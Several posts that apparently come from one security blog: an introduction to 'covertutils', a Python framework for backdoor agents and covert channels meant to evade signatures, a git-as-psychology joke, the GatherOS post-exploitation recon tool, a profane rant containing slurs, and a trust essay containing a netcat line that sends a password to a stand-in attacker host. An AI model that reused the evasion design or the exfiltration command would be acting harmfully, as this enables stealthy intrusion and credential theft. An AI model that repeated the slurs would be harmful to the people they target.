Reinventing the Wheel for the last time. The “covertutils” package.

 

The motivation

Those last months I came across several Github projects with RAT utilities, reverse shells, DNS shells, ICMP shells, anti-DLP mechanisms, covert channels and more. Researching code of other people gave me the ideas below:

Those things have to support at least an encryption scheme, some way of chunking and reassembling data, maybe compression, networking, error recovery. (To not mention working-hours operation-empire agent, certificate pinningmeterpreter and unit identification-pupyRAT).

And they all do! Their authors spent days trying to recreate the chunking for the AES Scheme, find a way to parse the Domain name from the exfiltrating DNS request, recalculate IP packet checksums and pack them back in place, etc…

And then it got me. A breeze of productivity. That crazy train of creation stopped just before my footnails. The door opened…

What about a framework that would handle all those by itself?

A framework that would be configurable enough to create everything from a TCP reverse shell, to a Pozzo & Lucky implementation.

A framework without even the most stable external dependencies, that uses only python build-ins

And all those without even thinking of encryption, message identification, channel password protections and that stuff we hate to code.

Then I started coding. Easter found me coding. Then Easter ended and I was still coding. Then I didn’t like my repo and deleted it altogether. I recreated it and did some more coding. Spent a day trying to support Python 3 and gave up after 10 hours of frustrated coding.

And finally it started working. The “covertutils” package was born. A proud python package! And here it is for your amusement:

https://github.com/operatorequals/covertutils

And here are the docs:

https://covertutils.readthedocs.io

Let’s get to it…

 

Basic Terminology of a backdoor

So let’s break down a common backdoor payload. In a backdoor we have mainly two sides. The one that is backdoored and the one that uses the backdoor.

The host that is backdoored typically runs a process that gives unauthorized access to something (typically OS shell). This process and the executable (binary or shellcode) that started it is the “Agent“.

The host that takes control of the backdoored machine typically does so using a program that interacts with the Agent in a specific way. This program is the “Handler” (from exploit/multi/handler anyone?)

Those two have to be completely compatible for the backdoor to work. Noticed how the Metasploit’s exploit/multi/handler asks for the payload that has been run to the remote host, just to know how to treat the incoming connection. Is it a reverse_tcp VNC? a stageless reverse_tcp_meterpreter?

Examining the similarities of those two (agents and handlers) helped me structure a python API, that is abstract, easy to learn, and configurable.

 

The covertutils API

All inner mechanics of the package end up in 2 major entities:

  • Handlers
    Which are abstract classes that model Backdoor Agent’s and Handler’s behavior (beaconing, silent execution, connect-back, etc).

    Attention passengers: The Handler classes are used to create both Agents and Handlers.

  • Orchestrators
    Which prepare the data that has to travel around. Encryption, chunking, steganography, are handled here.

With a proper combination of those two, a very-wide range of Backdoor Agents can be created. Everything from simple bind shells, to reverse HTTPS shells, and from ICMP shells to Pozzo & Lucky and other stego shells.

 

The data that is transferred is also modeled in three entities:

  • Messages
    Which are the exact things that an agent has to say to a handler and vice-versa.
  • Streams
    Arbitrary names, which are tags that inform the receiver for a specific meaning of the message. Think of them almost like meterpreter channels with the only difference that they are permanent.
  • Chunks
    Which are segmented data. They retain their Stream information though. When reassembled (using a Chunker instance) they return a (Stream, Message) tuple.

The Orchestrator

Orchestrators can be described as the “objects that decide about what is gonna fly through the channel“. They transform messages and streams to raw data chunks. Generally they operate like follows:

orchestrator.png

The chunks can then be decoded to the original message and stream by a compatible Orchestrator instance. They are designed to produce no duplicate output! Meaning that all bytes exported from this operation seem random to an observer (that hasn’t a compatible Orchestrator instance available). This feature is developed to avoid any kind of signature creation upon the created backdoors, when their data travel around networks…

The code that actually is needed for all this magic is the following:

>>> message = "find / -perm -4000 2>/dev/null"
>>> sorch = SimpleOrchestrator("Pa55w0rd!", streams = ['main'])
>>> chunks = sorch.readyMessage( message, 'main' )
>>> 
>>> for chunk in chunks :
...     print chunk.encode('hex')
... 
a3794050e26ad5935a1c
179083d79cad047be0a7
eb8bb3340b73ddc5eedb
af82b3a2a0f913a37a2f
3b0ddf0f365973dd4ae3
>>>

And to decode all this:

>>> sorch2 = SimpleOrchestrator("Pa55w0rd!", streams = ['main'], reverse = True)
>>> 
>>> for c in chunks :
...     stream, message = sorch2.depositChunk( c )
... 
>>> stream, message
('main', 'find / -perm -4000 2>/dev/null')
  • Note the reverse = True argument! It is used to create the compatible Orchestrator. Same objects are not compatible due to duplex OTP encryption channel.

 

The Handler

Handler‘s basic stuff is declared in an Abstract Base Class, called BaseHandler. There, 3 abstract functions are declared, to be implemented in every non-abstract subclass:

  • onMessage
  • onChunk
  • onNotRecognised

When data arrive to a Handler object, it uses the passed Orchestrator object (Handlers get initialized with an Orchestrator object) to try and translate it to a chunk. If it succeeds the onChunk(stream, message) method will be run. If the received data can’t be translated to a chunk then the onNotRecognised() will run.
Finally, and if the raw data is successfully translated, the Orchestrator will create the actual message when the last chunk of it is received. The onMessage(stream, message) method is run when a message is fully assembled.

The combined idea of a backdoor can be seen in the following image (fullscreen might be needed):

covertutilsbasicbackdoor.png

 

The Internals

How Streams are implemented

The Idea

Data needs to be tagged with a constant, for the handler to understand that it is meant to consume it. As a handler may receive data that is irrelevant, not sent from the agent, etc…

The problems in this idea are several. Bypassing them created the concept of the stream.

First of all, the constant has to be in a specific location in the data, for the handler to know where to search for it. That brings as to the second thing:

If a constant is located at a specific data offset, it defines a pattern. And a pattern can be identified. Then escalated to analysts. Then blacklisted. Then publicly reported and blocked by public anti-virus products.

So for the tagging idea to work well, we mustn’t use a constant. Yet the handler has to understand a pattern (that can’t be understood by analysts). Considering that both the Agent and Handler share a secret (for encryption), the solution is a Cycling Algorithm!

The StreamIdentifier Class

When sharing a secret, infinite secrets are shared. If the secret is pa55phra53 then we share SHA512(“pa55phra53“) too. And MD5(“pa55phra53“). And SHA512(SHA512(“pa55phra53“)). And MD5(SHA512(“pa55phra53“+”1”)). You get the idea.

So the StreamIdentifier uses this concept to create tags that are non-repetitive and non-guessable. It uses the shared secret as seed to generate a hash (the StandardCyclingAlgorithm is used by default, a homebrew, non-secure hasher) and returns the first few bytes as the tag.

When those bytes have to be recognized by a handler, the StreamIdentifier object of the handler will create the same hash, and do the comparison.

The catch is that when another data chunk has to be sent, the StreamIdentifier object will use the last created hash as seed to produce the new tag bytes. That makes the data-tag a variable value, as it is always produced from the previous tag used plus the secret.

A sequence of such tags is called a Stream.

Multiple Streams

Nothing stops the implementation from having multiple streams (in fact there is a probability pitfall, explained below…)! So instead of starting from “pa55phra53″ and generate a single sequence of, let’s say, 2 byte tags, we can start from “pa55phra531″, “pa55phra532”, “pa55phra533” … and create several such sequences (streams).

The StreamIdentifier will, not only identify that the data is consumable, but will also identify that a tag has been produced from “pa55phra531″, or “pa55phra533”. This can used to add context to the data. Say:

  • Everything produced from “pa55phra531 will be for Agent Operation Control (killswitch, mute, crypto rekeying, etc)
  • Everything produced from “pa55phra532 will be run on a OS shell
  • Everything produced from “pa55phra533 will be shellcode that has to be forked and run
  • Goes on and on…

Now the messages themselves do not need to follow a specific protocol, like:

shell:uname -a
asm:j
 X�Rh//shh/bin��̀
control:mute

they can be raw (saving bytes on the way), relying on the stream for delivering the context (when writing a RAT’y agent several features have to implemented, streams come in handy with this).

The streams are named with user-defined strings (e.g “shell”, “control”, etc) to help the developer.

 

The Pitfall

Tags have to be small. They shouldn’t eat to much of the bandwidth. They are like protocol headers in a way. Not too small to be guessable or randomly generated from a non-agent, not too big to be a small part of the raw data.

When implementing a tone of features using streams (say 8 features), using a 2-byte tag (it is the default) will create a small chance of collision. Specifically a 1/2341 chance (still more probable than finding a shiny pokemon in Pokemon Silver – 1/8192).
And to make things worse: this chance is not for the whole session, but per sent chunk (as tags are cycling for every chunk), so it is quite high!

The Solution

Well, maths got us down. For so many features, a new byte (3 byte tags) will minimize the chances tremendously. There is also an option to make the tags constant. This way the above chance counts for the whole session, making a collision quite hard.

 

Handler Types

At time of writing, there are several Handler Classes implemented. Each modelling a specific backdoor behavior.

  • BaseHandler
    This is the Base Class that exposes all abstract functions to the sub-class.
  • FunctionDictHandler
    Gets a (stream -> function) dict and for every message that arrives from stream x, the corresponding function is called with message as argument.
  • InterrogatingHandler
    This handler sends a constant message across to query for data. This is the way the classic reverse_http/s agents work. They periodically query the handler for commands, that are returned as responses. Couples with the ResponseOnlyHandler.
  • ResettableHandler
    This Handler accepts a constant value to reset all resettable components to initial state. The One Time Pad key, the stream seeds the chunker’s buffer, etc.
  • ResponseOnlyHandler
    This is the reverse of the InterrogatingHandler. It sits and waits for data. It sends data back only as responses to received data. Never Ad-Hoc.
  • StageableHandler
    This is a FunctionDictHandler that can be extended at runtime. It accepts serialized functions in special format from a dedicated stream, to add another tuple in the function-dict, extending functionality.

 

Orchestrators

The objects that handle the raw data to (stream, message) conversion are the Orchestrators.

They have some basic functionality of chunking, compression, stream tagging and encryption. They provide 2 methods, the readyMessage(message, stream) and the depositChunk(raw_data). The first one returns a list of data that are ready to be sent across (tagged, encrypted, etc), and the second one makes the Orchestrator try to consume data received and returns the (stream, message) tuple.

 

End of Part 1

The whole package includes several features that are not even mentioned in this article (Steganography, Data ManglingStegoInjector and DataTransformer classes-, etc), that while implemented, aren’t properly documented yet, so their internals may change.

They will be the subject of another post, along with a Pozzo & Lucky implementation using only coverutils and Raw Sockets.

 

I the mean time, there are some Example Programs for you to play around!

Feedback is always appreciated…

 

Advertisement

A Git Tutorial of Human Psychology

In Image and in Likeness

Catching Paragraph
that uses several seemingly irrelevant pieces of information to hook the reader.

Bible says that [G|g]od created humans “In Image and in Likeness“. While I am not that huge fan of Bible, I do believe that some things are not randomly written in this book.

In Image and in Likeness” is the only way to structure, design, and create something. No wonder, that God created people “In Image and in Likeness” himself. He couldn’t do it any other way…

 

Git is no Εxception

Creating Git Version Control was also a miracle (thanks again Linus). And it was created to resemble human nature and psychology as well. I don’t claim that the author and developers had this in mind when they started their codebase, but I do believe that they couldn’t help it.
Humans are doomed to duplicate themselves. With more than one ways…

 

Today’s Proof of Concept

All Git operations have human-side equivalents. Equivalents that resemble life choices and personal mind tricks. Branching, committing, rebasing, all are ways a person feels and acts about things.

 

The Childhood

Git init

Let there be light” (this is the last biblical reference, promise).
We can parallelize a person as a git repo. So here is what happens when a person is born:

God@Earth# NEW_PERSON="person-$(date +%s)-3"
God@Earth# mkdir $NEW_PERSON; cd $NEW_PERSON;
God@Earth# chroot . start_life $NEW_PERSON &

(the start_life executable starts by setting UID != 0, to avoid creating a new god.
This was the bug that created the Titans, Pantheon, Egyptian Gods and more, in the early years of development)

Because god runs Linux, and that’s for sure…

Then the person has its own process… It is alive! And this is what happens…

$ ls
$ ls -a
. ..
$ git init
Initialized empty Git repository in /.git
$

Here, we have a new proje… person! All initialized and ready to fulfill its life goals…

 

Git add

As a new project, at first, a person adds everything that is inside the directory inside the repo. And this isn’t always good…

$ ls
mother.love    old_sister.love    father.love    mother.tongue    mother.bad_habits    father.drinking_problem
$ git add *
$ git status
On branch master

Initial commit

Changes to be committed:
  (use "git rm --cached <file>..." to unstage)

    new file:   mother.bad_habits
    new file:   father.drinking_problem 
    new file:   mother.love
    new file:   old_sister.love
    new file:   father.love
    new file:   mother.tongue
$

A child sucks everything in its environment to slowly develop a personality. And carries all added things with it. But a personality isn’t actually created before the…

Initial Commit

And here we have the end of Childhood… A child with a discrete personality is a teenager. Almost not a child anymore…
And here is the line that differentiates the two:

$ git commit -m "Built personality PoC"
[master (root-commit) 46ae33f] Built personality PoC

 6 files changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 father.love
 create mode 100644 mother.love
 create mode 100644 mother.tongue
 create mode 100644 old_sister.love
 create mode 100644 father.drinking_problem 
 create mode 100644 mother.bad_habits
$

The Early Years

git commit

A commit happens every time a personal decision is made. As the commit is the most common command in git, it is also the most common mental condition in a person’s life. You commit every time consequences of your actions will affect you as a person. Just like a commit in git. It is a command that defines a state of you.

The .gitignore file!

A teenager starts to be more selective when adding things to his/her life. Tries to evaluate whether something is crucial for its development, or not.
A typical example of this is the following:

$ echo "mother.*" > .gitignore
$

This way a teenager permanently ignores all changes on its mother behavior, effectively carving its own way. One can add things to the .gitignore file as experience comes:

$ echo "*.assholes" >> .gitignore
$

Here we added the line to ignore all assholes, and prevent them from changing our life.

 

git branch

There are circumstances that you have to treat like a whole new person. There are events that need a whole fresh you when you first get into them, like relationships or hobbies. Events that every change they do to you, won’t affect you in other aspects of your life.

Let’s say that the teenager we left of, is a boy and is now ready to meet his first love “Lily”:

$ git status
On branch master
Untracked files:
  (use "git add <file>..." to include in what will be committed)

    lily.love
$

He is going to be a boyfriend, trying to leave the rest of his life intact. He has to create a new life branch.

$ git branch boyfriend_of_lily
$

git checkout

Now, every time he is with Lily he can just:

$ git checkout boyfriend_of_lily
$

and develop his relationship with her. Adding some Lily-specific files, or changing some already created ones. Also all commits done when with Lily, will affect their relationship only, not the rest of his life (hopefully).

People have countless branches. Think about hobbies, jobs and people that need a specific version of us to operate us expected… I do not treat my colleagues like my parents and I don’t cook with the same attitude I play basketball.

Sometimes, a hobby, a person, a general condition becomes so vital to us that is not “yet another thing” we do. It is something special, something really important to us… When this time happens for one of our branches we have to…

git merge

Here is why git shines. When we have a great hobby, that really means a lot to us, we have to merge it into our master branch.

$ git checkout master
$ git merge hobby_that_defines_you

after that, our hobby is included in the master branch, meaning that is an essential part of ourselves.

Problems start when some branches of ours that we want to merge to our master branch, have changed our inner selves in such a way that contradicts our personality.
When this happens we have the most serious first world problem:

 

The Merge Conflict…

Let’s say that:
as a person you are cheerful and generally happy, but then you met that goth girl, that  hates smiling and always wears that ring with the skull on it that gives you the creeps.

You are yourself when out with your friends, and you checkout to your Emo branch when with your goth girl! Great, that’s what branches are all about. But then you have to go to a party, were both your friends and your girlfriend will be there. Trying to merge those two branches raises the issue:

$ git checkout party_with_friends
$ git merge goth_girlfriend
Auto-merging attitude
CONFLICT (add/add): Merge conflict in attitude
Automatic merge failed; fix conflicts and then commit the result.
$
$ cat attitude
<<<<<<< HEAD
Happy and ready for the party!
=======
Look like I hate myself.
>>>>>>> goth_girlfriend

This issue has to be resolved. The way to resolve it is to get to that file and remove anything that doesn’t really belong to you.

I believe that all psychological problems start with such conflicts. When merging, back to master, incompatible branches of our egos… This is because the heavy development has to be done in master branch. The heavy development and commiting has to be in ourselves. While gaining experience we learn when to merge. We also learn when to…

 

git rebase

When a huge event like a marriage, a job, a loss, a break-up happens, our whole life is then defined by it. Our personal history can be split to before the event and after the event periods. We can remember being completely different before the event.

But now that the event has happened and we have plenty of commits on its branch, it is really easier to adopt our master branch on the branch of the new event, than checkout again to our old and dusty self – master branch.

This is when a rebase happens. When we need to redefine ourselves on top of another event. Notice the difference with the merge. Merge puts some additional things to our master. Rebase redefines our master to include the additional things historically.

 

Concluding

And the list goes on!

  • git cherry-pick, when we try to keep only the good stuff from a situation of ours,
  • git blame when we try to find when we made the wrong choice and what went wrong,
  • git tag when we accomplish something memorable.

The next time I get across someone that believes that computer science is far away from the human nature (there is such argument), I ‘ll answer 2 words (kinda)

$ git --help

*mic drop*

 

Information Gathering is not enough. Information storing and sharing is better. Meet GatherOS …

I ‘ve been absent for a while, switching jobs and analyzing personal goals couldn’t be postponed any longer. Now I am back to the grid! And I got a new tool too!

 

Why Gathering is a hell of a job…

Information about the target is what keeps the wheel spinning. More info, more attacks, more successful attacks, more shells, moar powah.

That applies perfectly for Vulnhub VMs and 3-4 hours CTFs, but the problem is obvious with assessments that require a team. The scalability isn’t exactly great when Information Gathering has to be done for a network and several hosts. Actually it ‘s a pain. If you have been there you know, if you haven’t, here are several examples:

- Hey, I started a minus A nmap for the slash 24
- Shit man, I am at 56 percent on the nmap.
- Ok, I control-c'd, what switches?
- Top 100, finished, come to see the results.
(Whole team leans towards a single monitor)
- OK OK, I GOT A SHELL (yelling)
- Great, what user? (yelling)
- wou wou data (www-data)
- What kernel?  (yelling)
- 3.8
- Distro?
- Ubuntu 14.04
- Check SUIDs!!!   (yelling)
- Hey buddy, stop yelling, I know what to do!
- I am not your buddy, pal
- I am not your pal, guy
- I am not your guy, friend
- I am not your...
...
- I uploaded the file!
- Good, what is the name?
- not *under* a *under* backdoor *dot* php (not_a_backdoor.php)
- Are you a moron? This is a Tomcat shit, why php?
- Who told me that?
- I told you before. (yelling)
- Oh, fuck you! You said that it 's Apache (yelling)
- Yes, it 's "Apache Tomcat" (yelling)
***Slap***

Generally Info-gathering with a team is a mess. Been there several times, yelled like this, got slapped twice, been to jail for ten long years, because I killed a guy who misinterpreted 1/* for */1 in a crontab file and then the whole team spent an hour on facebook as we missed to start our handler on time.

Tools have tried to bridge the gap. Most of them fail badly for inexperienced teams as they need an amount of seriousness to work. Dradis falls flat under this category. It is great but you have to learn to use it. Who has time for that shit? Life is short. People still use metasploit.

 

GatherOS: not the nasty shit you’re waiting for…

Two things are more essential than just gathering. They are sharing and storing. GatherOS handles them both neaty.

The Idea is simple. You got a Reverse/Bind Shell, SSH, physical access to a system (be it Linux or –for the love of god– Windows). There are some basic stuff you have to run on the shell to understand what kind of machine you semi-pwned.

If you like keyboard, you remember the commands (cat /etc/passwd, cat /etc/*release, crontab -l, etc) but you will miss at least one (uname -a).

If you once liked keyboard you have a script with nice and dandy output.
So you python -m SimpleHTTPServer 8080 the script and then you go for the download from the pwned machine:
wget: command not found.
OK, cool. You netcat to your machine and start typing the HTTP Request:

GET /scroipt.sh HTTP/1.1


404 Not Found

Mistyped the script name…

You whisper something on the classic “fuck” pentester’s dialect and open the script with gedit copy-pasting all the commands to the reverse shell. Hating yourself.

After half an hour a colleague asks you: “what was the MAC for the 172.16.47.128 ?“.
You have no idea, you are still copy-pasting…

 

What GatherOS does…

First things first. GatherOS resides here: https://github.com/operatorequals/gatheros
and has been the subject of about 2 rewrites. Also available with pip.
Just pip install gatheros and the commands will be in your PATH (like magic)!

Now the juicy stuff!

gatheros-exec

The heart of the package!

It’s a simple python module that gets a special formatted JSON file input containing OS commands, and runs them against a shell (be it reverse/bind/ssh/local). Then it stores the output in a JSON file.

 

gatheros-show

The reason GatherOS exists

This module consumes JSON files created by gatheros-exec and fires up a flask web application, nicely presenting the command outputs for everyone to see and admire!

 

A showcase!

$ gatheros-exec -o /tmp/$(uname -r).json local
[waiting less than a minute...]
$ ls -lh /tmp
Total 1-rw-r--r-- 1 unused unused 110K Feb 6 13:10 4.9.0-kali1-amd64.json

And done! GatherOS ran the default InfoGathering scenario (built-in) against the local machine. For SSH on port 1022 it would be:

$ gatheros-exec -o /tmp/$(uname -r).json ssh uname@localhost -p1022

 

Now that there is a GatherOS file we could present it with gatheros-show at port 8086 (default is 8085):

$ gatheros-show /tmp/4.9.0-kali1-amd64.json -p8086

Woah! A Firefox spawned with this:

This slideshow requires JavaScript.

Let’s see the MAC now!

gatheros_3

As you may have recognized the default Information Gathering Scenario is heavily based on the rebootuser’s Cheatsheet that I believe it is the complete Cheatsheet out there! I can’t, but thank this site as well as it’s references for providing so useful commands for eager privilege escalators!

A Windows Scenario will also be ready in a later release!

 

Storing the Info!

Just zip the JSON files for later use!
gatheros-show will always serve you whichever JSONs you feed it.

 

Why “Information Gathering scenarios” ?

Well, those JSONs aren’t just lists of grouped commands. They contain a whole logic on which commands should run in case some others fail to run, based on a dependency oriented model.
This aspect of GatherOS can be used to automatically launch local-root exploits and other goodies as well, and it will be explained in a later post, when some more development will have taken place!

Stay tuned, it ‘s gonna be huge!

 

 

In the Twisted mind of Upper Management

I have written before about how compliance fucks up security, this is a common ground now. This post isn’t about that, as it has been all used up in several conferences, blog posts, drunk Red Team meet-ups and so on.

This post will talk about the nonsense that takes place inside the average Security company itself. It is really astonishing how the most absurd situations just tend to all get together and find their home in Security companies.

But this whole post isn’t about that either. While some fucked up situations will be our case studies, the post will try to suggest the reason that all this shit doesn’t happen in companies that create refrigerators or condoms

 

The Model

A typical security company consists of about 3 departments. They can be 4 or 6 but they are simplified to the above 3:

  • A Red Team / Penetration Testing Team
  • A Development Team
  • A Monitoring/Operations Team

And they all suck for different reasons…

 

Stating what sucks…

The Red Team

Well, the Red Team doesn’t suck. Most of the time it is a bunch of folks that really know their shit deeply and all. What does suck is that they have to report things. And those guys, most of the time, can barely talk. Imagine how painful will be for them to write stuff. They pay for 1 hour of enjoyment (meterpreter dances, pizza breaks, pentesting vending machines and such hilarious stuff…) a total of 7 hours of hating themselves in front of a Word document, or similar text editor. They at least do what they love the 1/8 of the time…

The Developers

If you take a bunch o’ monkeys and leave them in a cage with enough pot they will eventually write a Security Product for Internal Use. This is the development department. The classic UML faggotry, Java nonsense, and such clichés all apply.

And every company has their product that isn’t of course ready yet, but it will soon be. And good Lord it is gonna kick ass when it ‘ll be…

Their reason of existence is simple. There can be no “Computer Company” without “Program Making“. It is well known that this is what Computers are all about: “Creating Programs” (in the twisted mind of upper management).

 

Monitoring/Operations

What does suck the most is the Monitoring part. And it sucks a lot. In a whole new, existential level.

If you take every guy in there they all wanted to be pentesters. Worse than that is that now they don’t know what exactly they are. And this agnostic mentality flows around the whole department. They are not sure if they maintain a Network Operation Center, a Security Operations Center, an Incident Response Center, a Log Storage Service, a Behavioral Analytics Service or a Hard Rock Cafe, whatever.

They are so clueless about their existence they need lengthy meetings to decide if they are capable of servicing a customer that needs a very specific service. They are not sure whether they support such service but they go “Fuck it” and onboard him anyway.

The only Group of people that knows exactly what kind of fruit is the Monitoring department is the Upper Management (spoiler alert: its a money and a cow, what is it?)…

 

 

Why does everything suck?

Meet the Beast: Upper Management

They couldn’t last a day in any department of the company. Most of the time they have no clue what the company is about. If you ask them: “Tell me what does your company provide without using the word ‘Security’ ?” they may get an epileptic seizure the next instant.

So Security Companies are fucked up because their bosses are collecting butterflies while they could at least study what they are being bosses at.

I mean, my idea about the Boss role (say the Platonic Idea) is the man that does the same work as you, but way better. If someone hires me that demands from me to make chickas, but he can’t do it himself, I can, very well, make chickos and he will barely notice (chickas and chickos are words I just invented, don’t google them).

But how can this work?

Spoiler Alert: It doesn’t… Have you ever heard of failure?
This situation can very well define failure. And this failure bleeds money until it bankrupts, really slowly.

This happens for a number of reasons. Someone needs to pay all those folks, working on maintaining the illusion of security to the customers.
The Company gets the annual money from contracts and projects, but instead of moving on with some education with that money, it hires more developers. Because more developers means less time for the product to come out (in the twisted mind of upper management)! And when it comes out it ‘s gonna kick ass and stop hacking worldwide! And EVERYONE is gonna buy it on a huge price anyways…
But, unfortunately when too many developers get together, nothing ever gets finished, so they could very well play Minecraft in LAN parties, or Dungeons & Dragons, or beat Piniatas and end up more productive than when actually coding for the project. Because development is something nearly impossible to do right (it takes a lot more than coding), and most of the time it becomes a black hole that  sucks money.

In the meantime someone among the pentesters has the free version of BurpSuite and the Monitoring Center has an underspecs server or two…

And how it stops (not) working…

This nonsense actually has two ways to stop:

  1. Developers suck up all the money and release no product.
  2. Developers release the product.

The first scenario is simple yet amazing. A bunch of people bring a whole company down by not doing what they had to, while working every day 9:00-17:00 (sometimes even in weekends). I find this scenario amusing! It is the college project failure scaled all the way up!

But the second scenario is the one closer to reality.
When development department proudly presents a product, that has the same functionality with a forgotten project of some Chinese guy on Github, and the whole Upper Management realises that they can’t sell this stuff because none in the security industry really needs something like this (this is also the reason the Chinese guy abandoned his project back at 2014), the company breaks down. And it does as it depended on the sales, that should have been tremendous!

 

Why those tragedies do not happen in companies that manufacture refrigerators or condoms…

Upper management can very well be non-technical in refrigerator or condom companies. But the big difference between Security companies and condom companies is the following:

Upper Management people use (or have used) condoms and will never use security products (not even nmap)!

In condom companies people that have meetings and make choices about the company do not need to be consulted about how a condom works by a specialist, or why use a condom.

In security companies, in the other hand, the non-technical upper management has no fucking clue, and will never understand if something is worth spending or not. They completely lack common sense regarding their service or product.

This can be very well understood with 3 examples:

Condom makers
[The Condom Designer]: Hey boss, I believe we need to make condoms with WiFi. The budget we 'll need is 150.000$.

[The Condom Boss]: You are fired.

This boss figured out from his* experience that condoms with WiFi are useless as fuck. This Designer got sucked and he deserved it because he lost hours trying to budgetize condoms with WiFi. Fuck him.

*: or rather “her“, I prefer female bosses.

Refrigerator makers
[The Refrigerator Designer]: Hey boss, I believe that we need to make refrigerators with microphones, cameras and TCP/IP stack to ensure good quality of service (?). The budget for this is 180.000$.

[The Refrigerator Boss]: You are fired. (hopefully)

Here the boss didn’t see the opportunity of the IoT circus. But he fired the ignorant bastard just to be on the safe side…

Security providers
[The Security Designer]: Hey boss, I believe that we need to develop a tool that can compromise every operating system, platform and network.
We 're gonna write this in Java, as it is cross platform (?), and the budget for this will be 300.000$.

[The Security Boss]: This is a great idea! We are gonna invest on this!

This boss has no idea about Cobalt Strike, Metasploit, etc. Tools that have been developed for years and are the defacto standard for the industry. He has no experience on “compromising” things.
If he ever knew what Java is all about, he would burst into tears of laughter before the Designer could finish the proposition. (For people that don’t know, Java is even worse than Ruby nowadays).
Plus the “compromise everything” sounds too bad-ass to be cheaper than 300.000$…

 

For me the last conversation has one more line:

[God] : Hey guys, come to see those two faggots! They are gonna write metasploit again, from scratch! (laughters).
In Java! (laughters)
(...laughters echo in paradise...)

I hand out to you a recipe of failure! Please stop cooking it…

 

 

 

 

 

 

 

Trust: a tale of Security, Philosophy, Reverse Engineering and Python

The role of Trust on InfoSec Incidents

Security boils down to be entirely about trust, if you come to think of it. Every information security incident could somehow be rephrased to include the word “Trust” in its reasons of happening. Just try anything:

  • SQL Injections all over the Web (and injection family exploits): “Mistrusted user input”.
  • Cross-Site Scripting: Mistrusting that a site will run on your browser only non-malicious code.
  • Superfish Incident: Add of an untrusted SSL Certificate in the Trust List of all computers from Lenovo.
  • Stuxnet:
    • Enough trust to a USB removable medium for it to be plugged in an “Air-gapped” computer.
    • Trust of the engineers on what they see (the backdoored health monitoring indication of the centrifuges) rather than what they hear (the centrifuges screaming as they were over-spinning).
  • Heartbleed, Shellshock: Trust on Open Source code auditing (as those were glaring bugs – and not the only ones)
  • Snowden’s leaks (it is a Security Incident for the 3-letter guys): Too much Trust on an employee (even a high positioned one).
  • … add your favorite Incident here …

And I mean all Security, Crypto included…

Encryption algorithms are trusted to be working. I mean there are Proofs on that they work (work means that decryption undoes encryption) but there aren’t proofs on that there can be no ways to deduce easily the key (easily meaning “easier than brute force”). There are also “Backdoored Ciphers” (with DES flirting closely with this speculation). Do we Trust these? Of, course not! Did we trust them before speculating or prooving they were backdoored? Sure, I mean, why not (DES was the fuckin’ Encryption Standard, as its name implies).

In the same manner: Today we trust AES. Ιf tomorrow we find out that there is a way to (instantly) decrypt every AES communication, we won’t trust it anymore. Meanwhile someone is reading us… And we have ourselves another trust-based security incident.

 

Why Trust anyway?

As  Ernst Alexander Rauter put it, in his famous “Creating subject people – How an opinion forms in the mind” (a book that isn’t sold on amazon in english – german edition),: “Trust is something that always upflows, from low power people to higher power people“. This is a very rough translation of the fact that people tend to trust things they don’t manipulate. Also people never want to feel scammed, so in defense of the exploration of an unwanted truth they prefer to just “trust“.

That’s why we trust crypto, and we trust our Operating System or our car. Because we can’t be 100% sure about their actions. So we politely assume that everything works as intended. Just to be gentle with ourselves.

 

The Trust Game in Computers

One of UNIX’s fathers, Ken Thompson, (apart from being the reason you see a.out files when compiling without arguments), implied a groundbreaking question in 1984 (a really controversial date!): “Do you trust your compiler? Do you trust your compiler so much that you are sure that when you compile the /bin/login binary, it won’t plant a backdoor in it?“. I am talking about the well-known “Ken Thompson Hack” documented in his awesome paper “Reflections on Trusting Trust“.

The truth is we trust our default gcc installation, and –seriously– never questioned it. It seems far-fetched to believe that there is such possibility. The reason for that is because we have to be reverse engineers to actually Check It. And this isn’t the case for the most of us…

 

 

Asking for and gaining Trust

My case study subject

Do you know about the kind of application called “Password Manager“? Applications like  “KeePass” that keep all your passwords in one place. They save them to disk in encrypted form and copy them to your clipboard whenever you need them, while you protect them all with a single “Master Password/Decryption Key“.

Asking for Trust

Those applications need a whole lot of trust from the users that use them. They could easily exfiltrate all your passwords to an unknown location without you noticing. In reality the only password worth exfiltrating is your email account’s password. If someone accesses your email’s password, the “Forgot my Password” button could do the rest of the work in all websites you’ve registered…

Gaining Trust

So how an application so crucial to your privacy gains Trust?

Well most of the time it doesn’t. Most of the time people assume that the binaries they download will do what they were described they do. Even their DLLs. But that’s because most people can’t actually check what an executable is doing. They trust because of their inability to know.

We need to go deeper

For an infosec researcher trust is gained. I trust that nmap works the way it works as I have wireshark‘d it a whole lot of times. I am sure https meterpreter is stealthy enough in many cases as I had it bypass my own firewall first. And I trust that keepass doesn’t make remote connections because of this:

n0p_sl3d@hostname:~$ objdump -D $(which keepassx) | grep socket
n0p_sl3d@hostname:~$

while:

n0p_sl3d@hostname:~$ objdump -D $(which netcat) | grep socket | wc -l
874

If you are used to C language Socket Programming you know that the way to open a network connection is through the socket function. And, in the untrimmed, non-statically compiled version of keepassx I use, there are no such calls in the binary. That’s definitely a good sign! Some trust is gained now!

But if you think of it, a call like:

system("echo %s | nc bad-domain.ddns.net 8080" % email_password);

doesn’t create a socket but would still exfiltrate my pass. That’s why keepass is Open Source. Just grep the code for similar looking calls, if you find any, keepass is a nasty traitor…

Sure that’s a lot of work but it is also your call how far you can go. Depending on how much you value your passwords. It’s a trade-of.

 

 For the Unconvinced

If keepass has a backdoor (while open-source) it has to be hidden in a smart way. And while you don’t know the author, you can’t be sure about his intentions. The only way to trust some things is to be 100% sure about how they operate. That brings us to the last part of this post:

 

100% Trust

The person highest in the Trust Scale, we maintain inside us, is ourselves. We ultimately believe in our eyes and hands. The Password Manager we will trust the most is the one that we will write ourselves or the one we carefully went through its code, and understood it line by line

This tends to be impossible for most Open Source projects, sometimes even for their contributors. Trust in Open Source projects suggests smaller, more comprehensive projects, in a Programming Language for humans, to be achieved in the desired 100% percent…

 

Python to the rescue!

There are like 15 actively used Programming Languages nowadays, but the ones they maintain a tiny chance of being understood in a glimpse of an eye are the english-like scripting ones (that means Python only).

So the goal was to create a Proof of Concept Python Password Manager that wouldn’t exceed 50 lines of code(single file) and will provide reasonable security, while being as easy to understand as possible maintaining the basic features. That way people would use it and be absolutely sure about what it does. The goal was to convince the unconvinced that this tool works as intended and only as intended. And here it is!

TinyPwdMan

TinyPwdMan‘s code can be found here: https://github.com/operatorequals/TinyPwdMan/blob/master/TinyPwdMan.py

